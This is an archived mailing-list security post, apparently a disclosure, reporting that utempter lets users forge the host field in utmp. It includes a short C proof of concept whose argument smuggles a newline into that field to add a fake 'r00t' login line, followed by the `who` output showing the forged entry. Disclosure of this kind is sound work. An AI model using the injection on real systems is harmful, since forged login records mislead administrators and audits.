[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

utempter allows fake host setting

Quoting from 

  Utempter does not (cannot?) verify the setting of host, so it can easily
  be faked. This may affect any software that depend on utmp correctness.
  Demo of the issue:
  psz@bari:~$ cat silly.c
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <unistd.h>
  #include <stdio.h>
  int main()
    int i;
    i = open("/dev/ptmx", O_RDWR);
    printf("open ptmx returned %d\n", i);
    dup2(i, 0);
    /* dup2(i, 1); */
    printf("doing utempter add\n");
    system("/usr/lib/utempter/utempter add 'xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com'");
    printf("checking who\n");
    system("who | grep xyz");
    printf("doing utempter del\n");
    system("/usr/lib/utempter/utempter del");
    printf("checking who\n");
    system("who | grep xyz");
  psz@bari:~$ cc silly.c; a.out
  open ptmx returned 3
  doing utempter add
  checking who
  psz      pts/29       Oct  4 11:48 (xyz)
  r00t     pts/0        Jan  1 01:02 (xyz.com)
  doing utempter del
  checking who
  Please see also:

Cheers, Paul

Paul Szabo   psz@xxxxxxxxxxxxxxxxx   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia